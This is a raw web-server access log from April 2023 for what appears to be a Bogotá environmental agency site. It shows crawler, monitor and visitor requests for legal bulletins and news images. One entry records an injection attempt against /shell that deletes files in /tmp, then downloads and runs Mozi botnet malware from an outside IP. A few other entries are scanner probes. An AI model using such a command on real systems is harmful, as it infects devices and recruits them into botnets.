52.167.144.167 - - [06/Apr/2023:03:31:07 -0500] "GET /BLA/resoluciones/AUTOS%202021/6402.pdf HTTP/1.1" 304 -
172.22.2.4 - - [06/Apr/2023:03:30:41 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
66.249.70.180 - - [06/Apr/2023:03:33:08 -0500] "-" 408 -
172.22.2.4 - - [06/Apr/2023:03:31:32 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57551
201.245.192.253 - - [06/Apr/2023:03:33:24 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42075
52.167.144.87 - - [06/Apr/2023:03:33:41 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/5262.pdf HTTP/1.1" 304 -
35.204.179.234 - - [06/Apr/2023:03:33:46 -0500] "GET /inventario-de-emisiones-2020-transporte-publico-sitp-redujo-emisiones-de-pm-2-5-en-un-37.html HTTP/1.1" 200 925
172.22.2.4 - - [06/Apr/2023:03:34:14 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9672
34.147.118.53 - - [06/Apr/2023:03:35:23 -0500] "GET /inventario-de-emisiones-2020-transporte-publico-sitp-redujo-emisiones-de-pm-2-5-en-un-37.html HTTP/1.1" 200 925
40.77.167.211 - - [06/Apr/2023:03:35:31 -0500] "GET /BLA/resoluciones/AUTOS%202021/2099.pdf HTTP/1.1" 304 -
216.245.221.92 - - [06/Apr/2023:03:35:38 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [06/Apr/2023:03:36:36 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9672
31.129.182.108 - - [06/Apr/2023:03:37:06 -0500] "GET / HTTP/1.1" 200 319
84.17.45.110 - - [06/Apr/2023:03:37:54 -0500] "GET /wp-login.php HTTP/1.1" 404 1018
172.22.2.4 - - [06/Apr/2023:03:36:31 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [06/Apr/2023:03:38:23 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42075
172.22.2.4 - - [06/Apr/2023:03:37:22 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 53104
172.22.2.4 - - [06/Apr/2023:03:39:30 -0500] "GET /BLA/boletinlegal/Circulares/2022/CIRCULAR%20No.%2000003%20DEL%2007%20DE%20MARZO%20DEL%202022.pdf HTTP/1.1" 304 -
201.245.192.253 - - [06/Apr/2023:03:40:13 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43008
201.245.192.253 - - [06/Apr/2023:03:40:16 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43167
216.245.221.92 - - [06/Apr/2023:03:40:38 -0500] "HEAD / HTTP/1.1" 200 -
52.167.144.44 - - [06/Apr/2023:03:42:27 -0500] "GET /en-semana-santa-realice-sus-tramites-ante-la-secretaria-de-ambiente-de-forma-virtual.html HTTP/1.1" 200 835
201.245.192.253 - - [06/Apr/2023:03:43:22 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42075
172.22.2.4 - - [06/Apr/2023:03:42:21 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
40.77.167.80 - - [06/Apr/2023:03:44:37 -0500] "GET /BLA/resoluciones/AUTOS%202014/1407.pdf HTTP/1.1" 304 -
66.249.70.180 - - [06/Apr/2023:03:44:42 -0500] "-" 408 -
207.46.13.216 - - [06/Apr/2023:03:44:42 -0500] "GET /BLA/resoluciones/AUTOS%202021/2153.pdf HTTP/1.1" 304 -
172.22.2.4 - - [06/Apr/2023:03:43:12 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57551
216.245.221.92 - - [06/Apr/2023:03:45:38 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [06/Apr/2023:03:48:21 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42075
207.46.13.216 - - [06/Apr/2023:03:49:31 -0500] "GET /BLA/resoluciones/AUTOS%202021/4815.pdf HTTP/1.1" 304 -
172.22.2.4 - - [06/Apr/2023:03:48:11 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [06/Apr/2023:03:50:38 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [06/Apr/2023:03:49:02 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57141
162.55.167.166 - - [06/Apr/2023:03:52:24 -0500] "GET / HTTP/1.1" 200 4720
162.55.167.166 - - [06/Apr/2023:03:52:25 -0500] "GET / HTTP/1.1" 200 319
201.245.192.253 - - [06/Apr/2023:03:53:19 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42075
31.13.127.9 - - [06/Apr/2023:03:53:36 -0500] "GET /images/WhatsApp%20Image%202023-04-05%20at%2013.54.41.jpeg HTTP/1.1" 200 210747
31.13.127.30 - - [06/Apr/2023:03:53:36 -0500] "GET /images/mejora-la-calidad-del-aire-en-bogota-5-abril.jpeg HTTP/1.1" 200 44341
216.245.221.92 - - [06/Apr/2023:03:55:38 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [06/Apr/2023:03:54:01 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [06/Apr/2023:03:54:47 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [06/Apr/2023:03:54:52 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 43256
40.77.167.211 - - [06/Apr/2023:03:56:46 -0500] "GET /BLA/resoluciones/AUTOS%202021/6758.pdf HTTP/1.1" 304 -
34.91.36.176 - - [06/Apr/2023:03:57:35 -0500] "GET /inventario-de-emisiones-2020-transporte-publico-sitp-redujo-emisiones-de-pm-2-5-en-un-37.html HTTP/1.1" 200 925
40.77.167.211 - - [06/Apr/2023:03:57:46 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202014/3414.pdf HTTP/1.1" 304 -
201.245.192.253 - - [06/Apr/2023:03:58:18 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42075
172.22.2.4 - - [06/Apr/2023:03:59:13 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9672
216.245.221.92 - - [06/Apr/2023:04:00:38 -0500] "HEAD / HTTP/1.1" 200 -
157.55.39.219 - - [06/Apr/2023:04:00:46 -0500] "GET /BLA/resoluciones/ HTTP/1.1" 200 13502
31.13.103.118 - - [06/Apr/2023:04:00:59 -0500] "GET /images/WhatsApp%20Image%202023-04-05%20at%2013.54.41.jpeg HTTP/1.1" 200 210747
40.77.167.80 - - [06/Apr/2023:04:01:08 -0500] "GET /BLA/resoluciones/dlf/styles.css HTTP/1.1" 200 3049
172.22.2.4 - - [06/Apr/2023:03:59:51 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [06/Apr/2023:04:02:02 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9672
66.249.70.184 - - [06/Apr/2023:04:02:06 -0500] "-" 408 -
172.22.2.4 - - [06/Apr/2023:04:00:42 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 52720
201.245.192.253 - - [06/Apr/2023:04:03:16 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42075
157.55.39.219 - - [06/Apr/2023:04:04:26 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/3456.pdf HTTP/1.1" 200 1292463
40.77.167.208 - - [06/Apr/2023:04:05:17 -0500] "GET /cooperacion-internacional-postulate-para-la-coordinacion-ambiental-de-proyecto-con-la-union-europea-avantia.html HTTP/1.1" 200 1020
216.245.221.92 - - [06/Apr/2023:04:05:38 -0500] "HEAD / HTTP/1.1" 200 -
114.119.144.15 - - [06/Apr/2023:04:06:42 -0500] "-" 408 -
172.22.2.4 - - [06/Apr/2023:04:05:41 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [06/Apr/2023:04:07:49 -0500] "GET /BLA/boletinlegal/robots.txt HTTP/1.1" 404 1038
172.22.2.4 - - [06/Apr/2023:04:07:50 -0500] "GET /BLA/boletinlegal/Circulares/2010/Circular%2005%20de%208%20de%20septiembre%20de%202010.pdf HTTP/1.1" 200 2146608
34.91.50.11 - - [06/Apr/2023:04:08:11 -0500] "GET /inventario-de-emisiones-2020-transporte-publico-sitp-redujo-emisiones-de-pm-2-5-en-un-37.html HTTP/1.1" 200 925
172.22.2.4 - - [06/Apr/2023:04:06:32 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57551
201.245.192.253 - - [06/Apr/2023:04:08:15 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42075
66.249.70.213 - - [06/Apr/2023:04:10:02 -0500] "-" 408 -
216.245.221.92 - - [06/Apr/2023:04:10:38 -0500] "HEAD / HTTP/1.1" 200 -
34.91.10.255 - - [06/Apr/2023:04:11:23 -0500] "GET /inventario-de-emisiones-2020-transporte-publico-sitp-redujo-emisiones-de-pm-2-5-en-un-37.html HTTP/1.1" 200 925
172.22.2.4 - - [06/Apr/2023:04:12:23 -0500] "GET /BLA/boletinlegal/jurisprudencia/analisis/Analisis%20jurisprudencial%20Sentencia%20C-366-11.doc HTTP/1.1" 200 59392
34.91.36.176 - - [06/Apr/2023:04:12:27 -0500] "GET /inventario-de-emisiones-2020-transporte-publico-sitp-redujo-emisiones-de-pm-2-5-en-un-37.html HTTP/1.1" 200 925
172.22.2.4 - - [06/Apr/2023:04:12:46 -0500] "GET /BLA/boletinlegal/documentos-importantes.php HTTP/1.1" 200 4829
172.22.2.4 - - [06/Apr/2023:04:12:57 -0500] "GET /BLA/boletinlegal/style.css HTTP/1.1" 200 9406
172.22.2.4 - - [06/Apr/2023:04:12:57 -0500] "GET /BLA/boletinlegal/js/ajax_documentos.js HTTP/1.1" 200 1155
172.22.2.4 - - [06/Apr/2023:04:12:57 -0500] "GET /BLA/boletinlegal/niceforms.js HTTP/1.1" 200 22876
172.22.2.4 - - [06/Apr/2023:04:12:58 -0500] "GET /BLA/boletinlegal/ajax.js HTTP/1.1" 200 577
172.22.2.4 - - [06/Apr/2023:04:11:31 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [06/Apr/2023:04:13:14 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42075
172.22.2.4 - - [06/Apr/2023:04:12:22 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57551
216.245.221.92 - - [06/Apr/2023:04:15:38 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [06/Apr/2023:04:18:14 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42075
172.22.2.4 - - [06/Apr/2023:04:17:21 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
222.133.102.9 - - [06/Apr/2023:04:19:05 -0500] "GET /shell?cd+/tmp;rm+-rf+*;wget+http://222.133.102.9:46904/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1" 404 1018
172.22.2.4 - - [06/Apr/2023:04:18:12 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58653
201.245.192.253 - - [06/Apr/2023:04:20:12 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42850
201.245.192.253 - - [06/Apr/2023:04:20:15 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43177
172.22.2.4 - - [06/Apr/2023:04:20:19 -0500] "GET /BLA/boletinlegal/Directivas/2011/Directiva%20No.%205%20del%2029%20de%20Agosto%20de%202011.pdf HTTP/1.1" 200 444404
216.245.221.92 - - [06/Apr/2023:04:20:38 -0500] "HEAD / HTTP/1.1" 200 -
66.249.64.217 - - [06/Apr/2023:04:20:48 -0500] "-" 408 -
172.22.2.4 - - [06/Apr/2023:04:22:30 -0500] "GET /BLA/boletinlegal/robots.txt HTTP/1.1" 404 1038
201.245.192.253 - - [06/Apr/2023:04:23:13 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42075
172.22.2.4 - - [06/Apr/2023:04:23:11 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [06/Apr/2023:04:25:38 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [06/Apr/2023:04:24:02 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59296
40.77.167.208 - - [06/Apr/2023:04:27:29 -0500] "GET /cooperacion-internacional-postulate-para-la-coordinacion-ambiental-de-proyecto-con-la-union-europea-avantia.html HTTP/1.1" 200 1020
201.245.192.253 - - [06/Apr/2023:04:28:12 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42075
40.77.167.211 - - [06/Apr/2023:04:29:08 -0500] "GET /bla/resoluciones/autos%202021/2048.pdf HTTP/1.1" 200 362011
69.63.189.119 - - [06/Apr/2023:04:29:23 -0500] "GET /images/caminos-de-los-cerros-1_optimized.jpeg HTTP/1.1" 200 49537
69.63.189.5 - - [06/Apr/2023:04:29:23 -0500] "GET /images/semana-bosques-1_optimized.1.jpg HTTP/1.1" 200 102892
69.63.189.118 - - [06/Apr/2023:04:29:23 -0500] "GET /images/rendicion-de-cuentas-post-01-02-(1)_optimized.jpg HTTP/1.1" 200 121430
69.63.189.120 - - [06/Apr/2023:04:29:24 -0500] "GET /images/palma-de-cera-1-abril_optimized.jpeg HTTP/1.1" 200 171987
69.63.189.119 - - [06/Apr/2023:04:29:24 -0500] "GET /images/atencion-al-ciudadano-abril.jpg HTTP/1.1" 200 116523
69.63.189.120 - - [06/Apr/2023:04:29:24 -0500] "GET /images/WhatsApp%20Image%202023-04-05%20at%2013.54.41.jpeg HTTP/1.1" 200 210747
69.63.189.2 - - [06/Apr/2023:04:29:24 -0500] "GET /images/mejora-la-calidad-del-aire-en-bogota-5-abril.jpeg HTTP/1.1" 200 44341
201.245.192.253 - - [06/Apr/2023:04:30:13 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42850
201.245.192.253 - - [06/Apr/2023:04:30:16 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43177
216.245.221.92 - - [06/Apr/2023:04:30:38 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [06/Apr/2023:04:29:01 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [06/Apr/2023:04:29:52 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 56277
172.22.2.4 - - [06/Apr/2023:04:32:35 -0500] "GET /BLA/boletinlegal/normativa.php HTTP/1.1" 200 8333
172.22.2.4 - - [06/Apr/2023:04:32:35 -0500] "GET /BLA/boletinlegal/styles2.css HTTP/1.1" 200 1838
172.22.2.4 - - [06/Apr/2023:04:32:35 -0500] "GET /BLA/boletinlegal/js/ajax_normativa.js HTTP/1.1" 200 1154
172.22.2.4 - - [06/Apr/2023:04:32:35 -0500] "GET /BLA/boletinlegal/niceforms.js HTTP/1.1" 200 22876
172.22.2.4 - - [06/Apr/2023:04:32:35 -0500] "GET /BLA/boletinlegal/style.css HTTP/1.1" 200 9406
172.22.2.4 - - [06/Apr/2023:04:32:35 -0500] "GET /BLA/boletinlegal/niceforms-default.css HTTP/1.1" 200 6694
172.22.2.4 - - [06/Apr/2023:04:32:35 -0500] "GET /BLA/boletinlegal/images/cabezote%20BLEGAL.jpg HTTP/1.1" 200 118164
172.22.2.4 - - [06/Apr/2023:04:32:35 -0500] "GET /BLA/boletinlegal/images/subscribe-icon-big.png HTTP/1.1" 200 47702
172.22.2.4 - - [06/Apr/2023:04:32:35 -0500] "GET /BLA/boletinlegal/images/registro-usuarios.png HTTP/1.1" 200 8106
172.22.2.4 - - [06/Apr/2023:04:32:35 -0500] "GET /BLA/boletinlegal/images/historia.png HTTP/1.1" 200 52775
172.22.2.4 - - [06/Apr/2023:04:32:35 -0500] "GET /BLA/boletinlegal/images/icono-email.png HTTP/1.1" 200 5544
172.22.2.4 - - [06/Apr/2023:04:32:35 -0500] "GET /BLA/boletinlegal/images/tel.png HTTP/1.1" 200 14477
172.22.2.4 - - [06/Apr/2023:04:32:35 -0500] "GET /BLA/boletinlegal/images/body_bg.jpg HTTP/1.1" 200 1601
172.22.2.4 - - [06/Apr/2023:04:32:35 -0500] "GET /BLA/boletinlegal/images/menu_lft.gif HTTP/1.1" 200 1713
172.22.2.4 - - [06/Apr/2023:04:32:35 -0500] "GET /BLA/boletinlegal/images/menu_rght.gif HTTP/1.1" 200 1627
172.22.2.4 - - [06/Apr/2023:04:32:35 -0500] "GET /BLA/boletinlegal/images/bg_top.jpg HTTP/1.1" 200 522
172.22.2.4 - - [06/Apr/2023:04:32:35 -0500] "GET /BLA/boletinlegal/images/hover.jpg HTTP/1.1" 200 640
172.22.2.4 - - [06/Apr/2023:04:32:35 -0500] "GET /BLA/boletinlegal/images/menu_bg.jpg HTTP/1.1" 200 620
172.22.2.4 - - [06/Apr/2023:04:32:35 -0500] "GET /BLA/boletinlegal/images/text.jpg HTTP/1.1" 200 568
172.22.2.4 - - [06/Apr/2023:04:32:35 -0500] "GET /BLA/boletinlegal/images/footer_bg.jpg HTTP/1.1" 200 586
172.22.2.4 - - [06/Apr/2023:04:32:35 -0500] "GET /BLA/boletinlegal/images/footer_bg_l.jpg HTTP/1.1" 200 776
172.22.2.4 - - [06/Apr/2023:04:32:35 -0500] "GET /BLA/boletinlegal/favicon.ico HTTP/1.1" 404 1334
172.22.2.4 - - [06/Apr/2023:04:32:35 -0500] "GET /BLA/boletinlegal/img/0.png HTTP/1.1" 200 110
172.22.2.4 - - [06/Apr/2023:04:32:35 -0500] "GET /BLA/boletinlegal/img/select-right.png HTTP/1.1" 200 44019
172.22.2.4 - - [06/Apr/2023:04:32:35 -0500] "GET /BLA/boletinlegal/img/select-left.png HTTP/1.1" 200 263
172.22.2.4 - - [06/Apr/2023:04:32:35 -0500] "GET /BLA/boletinlegal/img/button-left.png HTTP/1.1" 200 57071
172.22.2.4 - - [06/Apr/2023:04:32:35 -0500] "GET /BLA/boletinlegal/img/button.png HTTP/1.1" 200 43241
172.22.2.4 - - [06/Apr/2023:04:32:35 -0500] "GET /BLA/boletinlegal/img/button-right.png HTTP/1.1" 200 57878
172.22.2.4 - - [06/Apr/2023:04:32:53 -0500] "GET /BLA/boletinlegal/consulta_normativa.php?tipo=&sector=silvicultura&ano=2022&resuelve= HTTP/1.1" 200 454
201.245.192.253 - - [06/Apr/2023:04:33:10 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42075
216.245.221.92 - - [06/Apr/2023:04:35:38 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [06/Apr/2023:04:34:51 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [06/Apr/2023:04:35:42 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59646
201.245.192.253 - - [06/Apr/2023:04:38:09 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42075
66.249.70.210 - - [06/Apr/2023:04:40:02 -0500] "-" 408 -
201.245.192.253 - - [06/Apr/2023:04:40:12 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42850
201.245.192.253 - - [06/Apr/2023:04:40:15 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43177
216.245.221.92 - - [06/Apr/2023:04:40:38 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [06/Apr/2023:04:40:41 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
66.249.70.180 - - [06/Apr/2023:04:42:47 -0500] "-" 408 -
172.22.2.4 - - [06/Apr/2023:04:42:55 -0500] "GET /BLA/boletinlegal/circulares/2021/circular%20no.%2000006%20del%2005%20de%20agosto%20del%202021.pdf HTTP/1.1" 200 249615
69.63.184.3 - - [06/Apr/2023:04:42:55 -0500] "GET /images/mejora-la-calidad-del-aire-en-bogota-5-abril.jpeg HTTP/1.1" 200 44341
201.245.192.253 - - [06/Apr/2023:04:43:08 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42075
172.22.2.4 - - [06/Apr/2023:04:41:32 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57551
168.119.252.243 - - [06/Apr/2023:04:45:28 -0500] "GET / HTTP/1.1" 200 4720
168.119.252.243 - - [06/Apr/2023:04:45:28 -0500] "GET / HTTP/1.1" 200 319
216.245.221.92 - - [06/Apr/2023:04:45:38 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [06/Apr/2023:04:48:07 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42075
172.22.2.4 - - [06/Apr/2023:04:46:31 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
66.249.70.216 - - [06/Apr/2023:04:48:24 -0500] "-" 408 -
172.22.2.4 - - [06/Apr/2023:04:47:24 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59646
52.167.144.87 - - [06/Apr/2023:04:50:28 -0500] "GET /BLA/resoluciones/AUTOS%202021/4127.pdf HTTP/1.1" 304 -
216.245.221.92 - - [06/Apr/2023:04:50:38 -0500] "HEAD / HTTP/1.1" 200 -
40.77.167.208 - - [06/Apr/2023:04:50:52 -0500] "GET / HTTP/1.1" 200 319
201.245.192.253 - - [06/Apr/2023:04:53:08 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42075
35.204.203.11 - - [06/Apr/2023:04:53:29 -0500] "GET /inventario-de-emisiones-2020-transporte-publico-sitp-redujo-emisiones-de-pm-2-5-en-un-37.html HTTP/1.1" 200 925
172.22.2.4 - - [06/Apr/2023:04:52:23 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [06/Apr/2023:04:53:14 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57551
34.147.120.241 - - [06/Apr/2023:04:55:05 -0500] "GET /inventario-de-emisiones-2020-transporte-publico-sitp-redujo-emisiones-de-pm-2-5-en-un-37.html HTTP/1.1" 200 925
66.249.70.210 - - [06/Apr/2023:04:55:08 -0500] "-" 408 -
172.22.2.4 - - [06/Apr/2023:04:55:08 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9672
216.245.221.92 - - [06/Apr/2023:04:55:38 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [06/Apr/2023:04:56:01 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9672
40.77.167.80 - - [06/Apr/2023:04:57:55 -0500] "GET /BLA/resoluciones/AUTOS%202018/3659.pdf HTTP/1.1" 200 248166
201.245.192.253 - - [06/Apr/2023:04:58:05 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42075
52.167.144.87 - - [06/Apr/2023:04:58:28 -0500] "GET /BLA/resoluciones/AUTOS%202021/4017.pdf HTTP/1.1" 304 -
172.22.2.4 - - [06/Apr/2023:04:58:13 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
34.91.10.255 - - [06/Apr/2023:05:00:17 -0500] "GET /inventario-de-emisiones-2020-transporte-publico-sitp-redujo-emisiones-de-pm-2-5-en-un-37.html HTTP/1.1" 200 925
216.245.221.92 - - [06/Apr/2023:05:00:38 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [06/Apr/2023:04:59:04 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 53914
35.204.221.1 - - [06/Apr/2023:05:01:13 -0500] "GET /inventario-de-emisiones-2020-transporte-publico-sitp-redujo-emisiones-de-pm-2-5-en-un-37.html HTTP/1.1" 200 925
172.22.2.4 - - [06/Apr/2023:05:01:41 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9672
201.245.192.253 - - [06/Apr/2023:05:03:02 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42075
94.102.61.10 - - [06/Apr/2023:05:03:10 -0500] "GET /portaldeninos/ HTTP/1.1" 200 14393
172.22.2.4 - - [06/Apr/2023:05:04:38 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9672
216.245.221.92 - - [06/Apr/2023:05:05:38 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [06/Apr/2023:05:04:03 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
94.102.61.10 - - [06/Apr/2023:05:06:27 -0500] "GET /portaldeninos/ HTTP/1.1" 200 14393
172.22.2.4 - - [06/Apr/2023:05:04:54 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57551
66.249.70.210 - - [06/Apr/2023:05:07:51 -0500] "-" 408 -
201.245.192.253 - - [06/Apr/2023:05:08:00 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42075
216.245.221.92 - - [06/Apr/2023:05:10:38 -0500] "HEAD / HTTP/1.1" 200 -
1.189.41.195 - - [06/Apr/2023:05:10:46 -0500] "GET / HTTP/1.0" 200 319
172.22.2.4 - - [06/Apr/2023:05:09:53 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
211.137.24.98 - - [06/Apr/2023:05:11:43 -0500] "GET / HTTP/1.1" 200 319
27.47.26.77 - - [06/Apr/2023:05:11:43 -0500] "GET /favicon.ico HTTP/1.1" 200 7782
40.77.167.80 - - [06/Apr/2023:05:11:44 -0500] "GET /BLA/resoluciones/AUTOS%202022/8359.pdf HTTP/1.1" 200 392029
172.22.2.4 - - [06/Apr/2023:05:10:44 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 56744
201.245.192.253 - - [06/Apr/2023:05:12:58 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42075
157.55.39.219 - - [06/Apr/2023:05:13:34 -0500] "GET /BLA/resoluciones/AUTOS%202018/6537.pdf HTTP/1.1" 200 421895
52.167.144.124 - - [06/Apr/2023:05:14:25 -0500] "GET /BLA/boletinlegal/Circulares/2022/CIRCULAR%20No.%2000004%20DEL%2019%20DE%20MAYO%20DEL%202022.pdf HTTP/1.1" 200 252981
216.245.221.92 - - [06/Apr/2023:05:15:38 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [06/Apr/2023:05:15:43 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [06/Apr/2023:05:17:58 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42075
172.22.2.4 - - [06/Apr/2023:05:16:34 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59296
172.22.2.4 - - [06/Apr/2023:05:19:10 -0500] "GET /BLA/boletinlegal/Directivas/2017/Directiva%20No.%2006%20del%2016%20de%20Agosto%20de%202017.pdf HTTP/1.1" 304 -
201.245.192.253 - - [06/Apr/2023:05:20:13 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [06/Apr/2023:05:20:13 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42690
201.245.192.253 - - [06/Apr/2023:05:20:16 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43183
216.245.221.92 - - [06/Apr/2023:05:20:38 -0500] "HEAD / HTTP/1.1" 200 -
66.249.70.210 - - [06/Apr/2023:05:21:45 -0500] "-" 408 -
201.245.192.253 - - [06/Apr/2023:05:22:57 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42075
172.22.2.4 - - [06/Apr/2023:05:21:33 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [06/Apr/2023:05:22:24 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 52720
173.252.87.15 - - [06/Apr/2023:05:25:36 -0500] "GET /images/WhatsApp%20Image%202023-04-05%20at%2013.54.41.jpeg HTTP/1.1" 200 210747
216.245.221.92 - - [06/Apr/2023:05:25:38 -0500] "HEAD / HTTP/1.1" 200 -
193.32.162.159 - - [06/Apr/2023:05:26:19 -0500] "GET / HTTP/1.1" 200 319
193.32.162.159 - - [06/Apr/2023:05:26:29 -0500] "GET /dispatch.asp HTTP/1.1" 404 1018
172.22.2.4 - - [06/Apr/2023:05:27:03 -0500] "GET /BLA/boletinlegal/Circulares/2023/CIRCULAR%20No.%2000002%20DEL%2020%20DE%20FEBRERO%20DEL%202023.pdf HTTP/1.1" 304 -
40.77.167.208 - - [06/Apr/2023:05:27:07 -0500] "GET / HTTP/1.1" 200 4720
157.55.39.219 - - [06/Apr/2023:05:27:25 -0500] "GET /BLA/resoluciones/AUTOS%202008/3329.pdf HTTP/1.1" 200 58714
201.245.192.253 - - [06/Apr/2023:05:27:57 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42075
172.22.2.4 - - [06/Apr/2023:05:27:23 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [06/Apr/2023:05:28:14 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59296
201.245.192.253 - - [06/Apr/2023:05:30:12 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42690
201.245.192.253 - - [06/Apr/2023:05:30:15 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43183
31.13.127.12 - - [06/Apr/2023:05:30:32 -0500] "GET /images/caminos-de-los-cerros-1_optimized.jpeg HTTP/1.1" 200 49537
